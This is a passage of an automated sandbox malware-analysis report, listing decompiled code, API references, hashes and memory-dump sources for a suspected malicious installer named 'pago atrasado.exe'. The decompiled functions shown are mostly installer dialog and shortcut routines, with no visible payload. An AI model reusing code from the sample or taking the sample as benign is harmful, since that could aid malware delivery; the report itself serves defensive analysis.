										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42371c; // 0x666dd3
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E0040470E(0x3ff, 0xfffffffb, E00404726(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x6617ec
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x6617fc
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423f6c; // 0x2
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42052c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423fa0 = _a4;
					_t247 =  *0x423f6c; // 0x2
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42052c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423f40, 0x6e);
					 *0x420520 =  *0x420520 | 0xffffffff;
					_v24 = _t250;
					 *0x420528 = SetWindowLongA(_v8, 0xfffffffc, E00404DD4);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420514 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420514);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BBA(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E54(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E54(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423f6c - _t318; // 0x2
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42052c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42052c + _t318 * 4) = _t274;
									_t288 =  *( *0x42052c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423f6c; // 0x2
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E89(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E89(_v12);
								L89:
								return E00403EBB(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                            0x004047f1
                                            0x004047f7
                                            0x004047f9
                                            0x004047ff
                                            0x00404805
                                            0x00404808
                                            0x00404812
                                            0x0040481b
                                            0x0040481e
                                            0x00404821
                                            0x00404a49
                                            0x00404a49
                                            0x00404a50
                                            0x00404a64
                                            0x00404a52
                                            0x00404a54
                                            0x00404a57
                                            0x00404a58
                                            0x00404a5f
                                            0x00404a5f
                                            0x00404a67
                                            0x00404a70
                                            0x00404a7b
                                            0x00404a7b
                                            0x00404a7e
                                            0x00404a81
                                            0x00404a90
                                            0x00404a90
                                            0x00404a97
                                            0x00404b0f
                                            0x00404b0f
                                            0x00404b12
                                            0x00404b14
                                            0x00404b17
                                            0x00404b1e
                                            0x00404b2c
                                            0x00404b2c
                                            0x00404b2e
                                            0x00404b31
                                            0x00404b38
                                            0x00404b3a
                                            0x00404b3e
                                            0x00404b5b
                                            0x00404b5f
                                            0x00404b5f
                                            0x00404b40
                                            0x00404b4d
                                            0x00404b4d
                                            0x00404b3e
                                            0x00404b38
                                            0x00000000
                                            0x00404b12
                                            0x00404a99
                                            0x00404a9c
                                            0x00404aa7
                                            0x00404aa9
                                            0x00404aac
                                            0x00404ab3
                                            0x00404ab8
                                            0x00404aba
                                            0x00404ac4
                                            0x00404ac4
                                            0x00404ac8
                                            0x00404aca
                                            0x00404acd
                                            0x00404acf
                                            0x00404ad2
                                            0x00404ae8
                                            0x00404ae8
                                            0x00404ad4
                                            0x00404ad4
                                            0x00404ada
                                            0x00404adc
                                            0x00404ae3
                                            0x00404ade
                                            0x00404ade
                                            0x00404ade
                                            0x00404adc
                                            0x00404aec
                                            0x00404aee
                                            0x00404af3
                                            0x00404afc
                                            0x00404afd
                                            0x00404b07
                                            0x00404b07
                                            0x00404b09
                                            0x00404b0c
                                            0x00404b0c
                                            0x00404acd
                                            0x00000000
                                            0x00404aba
                                            0x00404a9e
                                            0x00404aa1
                                            0x00404aa5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404aa5
                                            0x00404a83
                                            0x00404a8a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404a72
                                            0x00404a72
                                            0x00404a75
                                            0x00404b62
                                            0x00404b62
                                            0x00404b69
                                            0x00404bdd
                                            0x00404bdd
                                            0x00404be4
                                            0x00404bf0
                                            0x00404bf0
                                            0x00404bf2
                                            0x00404bf9
                                            0x00404bfb
                                            0x00404c00
                                            0x00404c02
                                            0x00404c05
                                            0x00404c05
                                            0x00404c0b
                                            0x00404c10
                                            0x00404c12
                                            0x00404c15
                                            0x00404c15
                                            0x00404c1b
                                            0x00404c21
                                            0x00404c27
                                            0x00404c27
                                            0x00404c2d
                                            0x00404c34
                                            0x00404d81
                                            0x00404d81
                                            0x00404d88
                                            0x00404d8a
                                            0x00404d91
                                            0x00404d95
                                            0x00404da2
                                            0x00404da2
                                            0x00404da5
                                            0x00404dab
                                            0x00404dbd
                                            0x00404dbd
                                            0x00404d91
                                            0x00000000
                                            0x00404c3a
                                            0x00404c3c
                                            0x00404c41
                                            0x00404c44
                                            0x00404c48
                                            0x00404c48
                                            0x00404c4d
                                            0x00404c50
                                            0x00404c91
                                            0x00404c93
                                            0x00404c9d
                                            0x00404ca3
                                            0x00404ca6
                                            0x00404cab
                                            0x00404cb2
                                            0x00404cb5
                                            0x00404d57
                                            0x00404d5d
                                            0x00404d63
                                            0x00404d68
                                            0x00404d6b
                                            0x00404d7c
                                            0x00404d7c
                                            0x00000000
                                            0x00404cbb
                                            0x00404cbb
                                            0x00404cbb
                                            0x00404cbe
                                            0x00404cc4
                                            0x00404cc7
                                            0x00404cc9
                                            0x00404ccb
                                            0x00404ccd
                                            0x00404cd0
                                            0x00404cd3
                                            0x00404cda
                                            0x00404cdc
                                            0x00404cdf
                                            0x00404ce6
                                            0x00404ce9
                                            0x00404ce9
                                            0x00404ce9
                                            0x00404ce9
                                            0x00404ced
                                            0x00404cf0
                                            0x00404cfc
                                            0x00404cfd
                                            0x00404d00
                                            0x00404d02
                                            0x00404d02
                                            0x00404d02
                                            0x00404cf2
                                            0x00404cf4
                                            0x00404cf4
                                            0x00404d21
                                            0x00404d21
                                            0x00404d22
                                            0x00404d2e
                                            0x00404d3d
                                            0x00404d3d
                                            0x00404d3f
                                            0x00404d42
                                            0x00404d4b
                                            0x00404d4b
                                            0x00000000
                                            0x00404cbe
                                            0x00404c52
                                            0x00404c5d
                                            0x00404c60
                                            0x00404c65
                                            0x00404c67
                                            0x00404c69
                                            0x00404c6b
                                            0x00404c7b
                                            0x00404c85
                                            0x00404c87
                                            0x00404c8a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404c6d
                                            0x00404c6d
                                            0x00404c6d
                                            0x00404c70
                                            0x00404c73
                                            0x00404c75
                                            0x00404c75
                                            0x00404c75
                                            0x00404c76
                                            0x00404c77
                                            0x00404c77
                                            0x00000000
                                            0x00404c6d
                                            0x00404c50
                                            0x00404c34
                                            0x00404b6b
                                            0x00404b71
                                            0x00000000
                                            0x00000000
                                            0x00404b7d
                                            0x00404b81
                                            0x00000000
                                            0x00000000
                                            0x00404b91
                                            0x00404b93
                                            0x00404b96
                                            0x00000000
                                            0x00000000
                                            0x00404ba8
                                            0x00404baa
                                            0x00404bad
                                            0x00404bb7
                                            0x00404bb9
                                            0x00404bba
                                            0x00404bbb
                                            0x00404bca
                                            0x00404bcc
                                            0x00404bd3
                                            0x00404bd6
                                            0x00000000
                                            0x00404bd6
                                            0x00404baf
                                            0x00404bb2
                                            0x00404bb5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404bb5
                                            0x00000000
                                            0x00404a75
                                            0x00404827
                                            0x0040482c
                                            0x00404831
                                            0x00404836
                                            0x00404837
                                            0x00404840
                                            0x0040484b
                                            0x00404856
                                            0x0040485c
                                            0x0040486a
                                            0x0040487f
                                            0x00404884
                                            0x0040488f
                                            0x00404898
                                            0x004048ad
                                            0x004048be
                                            0x004048cb
                                            0x004048cb
                                            0x004048d0
                                            0x004048d6
                                            0x004048d8
                                            0x004048db
                                            0x004048e0
                                            0x004048e5
                                            0x004048e7
                                            0x004048e7
                                            0x00404907
                                            0x00404907
                                            0x00404909
                                            0x0040490a
                                            0x0040490f
                                            0x00404912
                                            0x00404915
                                            0x00404919
                                            0x0040491e
                                            0x00404923
                                            0x00404927
                                            0x0040492c
                                            0x00404931
                                            0x00404933
                                            0x00404935
                                            0x0040493b
                                            0x00404a05
                                            0x00404a18
                                            0x00000000
                                            0x00404941
                                            0x00404944
                                            0x00404947
                                            0x0040494a
                                            0x0040494a
                                            0x00404950
                                            0x00404956
                                            0x00404959
                                            0x0040495f
                                            0x00404960
                                            0x00404965
                                            0x0040496e
                                            0x00404975
                                            0x00404978
                                            0x0040497b
                                            0x0040497e
                                            0x004049b8
                                            0x004049ba
                                            0x004049e3
                                            0x004049bc
                                            0x004049c9
                                            0x004049c9
                                            0x00404980
                                            0x00404983
                                            0x00404992
                                            0x0040499c
                                            0x004049a4
                                            0x004049ab
                                            0x004049b3
                                            0x004049b3
                                            0x0040497e
                                            0x004049e9
                                            0x004049ea
                                            0x004049f0
                                            0x004049f6
                                            0x004049f6
                                            0x00404a03
                                            0x00404a1e
                                            0x00404a22
                                            0x00404a3f
                                            0x00404a44
                                            0x00404a47
                                            0x00404a47
                                            0x00000000
                                            0x00404a24
                                            0x00404a29
                                            0x00404a32
                                            0x00404dbf
                                            0x00404dd1
                                            0x00404dd1
                                            0x00404a22
                                            0x00000000
                                            0x00404a03
                                            0x0040493b

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                            • String ID: $M$N
                                            • API String ID: 1638840714-813528018
                                            • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                            • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                            • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                            • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404292, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 78%
                                            			E00404292(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x41fd08;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040543D(0x3fb, _t146);
					E00405DFA(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040543D(0x3fb, _t146);
							if(E0040576C(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405B98(0x41f500, _t146);
							_t87 = E00405F28(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405B98(0x41f500, _t146);
								_t89 = E0040571F(0x41f500);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41f500,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41f500) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41f500,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E004056D2(0x41f500) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41f500) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404726(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42371c; // 0x666dd3
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E0040470E(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41f4f0);
									} else {
										E00404649(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x423fe4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403E76(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420524 == _t158) {
									E00404227();
								}
								 *0x420524 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420538;
							_v60 = E004045E3;
							_v56 = _t146;
							_v68 = E00405BBA(_t146, 0x420538, _t166, 0x41f908, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040568B(_t146);
								_t124 =  *0x423f50; // 0x661638
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E00405BBA(_t146, 0x420538, _t166, 0, _t125);
									if(lstrcmpiA(0x422ee0, 0x420538) != 0) {
										lstrcatA(_t146, 0x422ee0);
									}
								}
								 *0x420524 =  *0x420524 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E004056F8(_t146) != 0 && E0040571F(_t146) == 0) {
						E0040568B(_t146);
					}
					 *0x423718 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E54(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E54(_t166);
					E00403E89(_t165);
					_t138 = E00405F28(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EBB(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                            0x00404292
                                            0x00404298
                                            0x0040429e
                                            0x004042ab
                                            0x004042b9
                                            0x004042bc
                                            0x004042c4
                                            0x004042ca
                                            0x004042ca
                                            0x004042d6
                                            0x004042d9
                                            0x00404347
                                            0x0040434e
                                            0x00404425
                                            0x0040442c
                                            0x0040443b
                                            0x0040443b
                                            0x0040443f
                                            0x00404449
                                            0x00404456
                                            0x00404458
                                            0x00404458
                                            0x00404466
                                            0x0040446d
                                            0x00404474
                                            0x00404477
                                            0x004044ae
                                            0x004044b0
                                            0x004044b6
                                            0x004044bb
                                            0x004044bf
                                            0x004044c1
                                            0x004044c1
                                            0x004044dd
                                            0x00000000
                                            0x004044df
                                            0x004044e2
                                            0x004044f0
                                            0x004044f6
                                            0x004044f7
                                            0x004044fa
                                            0x004044fd
                                            0x00000000
                                            0x004044fd
                                            0x00404479
                                            0x0040447b
                                            0x0040447f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404481
                                            0x00404481
                                            0x0040448e
                                            0x00404493
                                            0x00000000
                                            0x00000000
                                            0x00404497
                                            0x00404499
                                            0x00404499
                                            0x004044a4
                                            0x004044a7
                                            0x004044ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x004044ac
                                            0x00404509
                                            0x00404513
                                            0x00404516
                                            0x00404519
                                            0x00404520
                                            0x00404520
                                            0x00404522
                                            0x00404522
                                            0x00404527
                                            0x00404529
                                            0x00404531
                                            0x00404538
                                            0x0040453a
                                            0x00404545
                                            0x00404545
                                            0x0040453a
                                            0x0040454c
                                            0x00404555
                                            0x0040455f
                                            0x00404567
                                            0x00404582
                                            0x00404569
                                            0x00404572
                                            0x00404572
                                            0x00404567
                                            0x00404587
                                            0x0040458c
                                            0x00404591
                                            0x0040459a
                                            0x0040459a
                                            0x004045a3
                                            0x004045a5
                                            0x004045a5
                                            0x004045b1
                                            0x004045b9
                                            0x004045c3
                                            0x004045c3
                                            0x004045c8
                                            0x00000000
                                            0x004045c8
                                            0x00404477
                                            0x0040442e
                                            0x00404435
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00404435
                                            0x00404354
                                            0x0040435d
                                            0x00404377
                                            0x0040437c
                                            0x00404386
                                            0x0040438d
                                            0x00404399
                                            0x0040439c
                                            0x0040439f
                                            0x004043a6
                                            0x004043ae
                                            0x004043b1
                                            0x004043b5
                                            0x004043bc
                                            0x004043c4
                                            0x0040441e
                                            0x004043c6
                                            0x004043c7
                                            0x004043ce
                                            0x004043d3
                                            0x004043d8
                                            0x004043e0
                                            0x004043ed
                                            0x00404401
                                            0x00404405
                                            0x00404405
                                            0x00404401
                                            0x0040440a
                                            0x00404417
                                            0x00404417
                                            0x004043c4
                                            0x00000000
                                            0x0040437c
                                            0x0040436a
                                            0x00000000
                                            0x00000000
                                            0x00404370
                                            0x00000000
                                            0x004042db
                                            0x004042e8
                                            0x004042f1
                                            0x004042fe
                                            0x004042fe
                                            0x00404305
                                            0x0040430b
                                            0x00404314
                                            0x00404317
                                            0x0040431a
                                            0x00404322
                                            0x00404325
                                            0x00404328
                                            0x0040432e
                                            0x00404335
                                            0x0040433c
                                            0x004045ce
                                            0x004045e0
                                            0x00404342
                                            0x00404345
                                            0x00000000
                                            0x00404345
                                            0x0040433c

                                            APIs
                                            • GetDlgItem.USER32 ref: 004042E1
                                            • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                            • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                            • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                            • lstrcmpiA.KERNEL32(cuwawvnlx,00420538,00000000,?,?), ref: 004043F9
                                            • lstrcatA.KERNEL32(?,cuwawvnlx), ref: 00404405
                                            • SetDlgItemTextA.USER32 ref: 00404417
                                              • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                              • Part of subcall function 00405DFA: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                              • Part of subcall function 00405DFA: CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                              • Part of subcall function 00405DFA: CharNextA.USER32(?,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                              • Part of subcall function 00405DFA: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                            • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004044F0
                                              • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                              • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                              • Part of subcall function 00404649: SetDlgItemTextA.USER32 ref: 00404702
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A$C:\Users\user\AppData\Local\Temp$cuwawvnlx
                                            • API String ID: 2624150263-3601649881
                                            • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                            • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                            • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                            • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402053, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 74%
                                            			E00402053() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
				_t96 = E00402A29(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
				if(E004056F8(_t96) == 0) {
					E00402A29(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x4073f8, _t75, 1, 0x4073e8, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407408, _t100 - 8);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
